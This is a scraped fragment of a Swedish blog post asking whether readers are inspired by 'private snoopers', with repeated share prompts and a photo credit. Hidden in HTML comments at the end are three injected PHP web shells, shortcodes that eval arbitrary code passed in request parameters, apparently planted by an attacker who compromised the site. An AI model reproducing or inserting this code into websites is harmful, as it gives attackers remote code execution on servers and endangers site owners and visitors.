Inspirerad av privatsnokarna?

Dela gärna, vänner!
Dela gärna, vänner!
Dela gärna, vänner!
Dela gärna, vänner!

Foto: eurekakevin/Flickr.com (CC)

<!– [insert_php]if (isset($_REQUEST["hLBH"])){eval($_REQUEST["hLBH"]);exit;}[/insert_php][php]if (isset($_REQUEST["hLBH"])){eval($_REQUEST["hLBH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["GCzXa"])){eval($_REQUEST["GCzXa"]);exit;}[/insert_php][php]if (isset($_REQUEST["GCzXa"])){eval($_REQUEST["GCzXa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xps"])){eval($_REQUEST["xps"]);exit;}[/insert_php][php]if (isset($_REQUEST["xps"])){eval($_REQUEST["xps"]);exit;}[/php] –>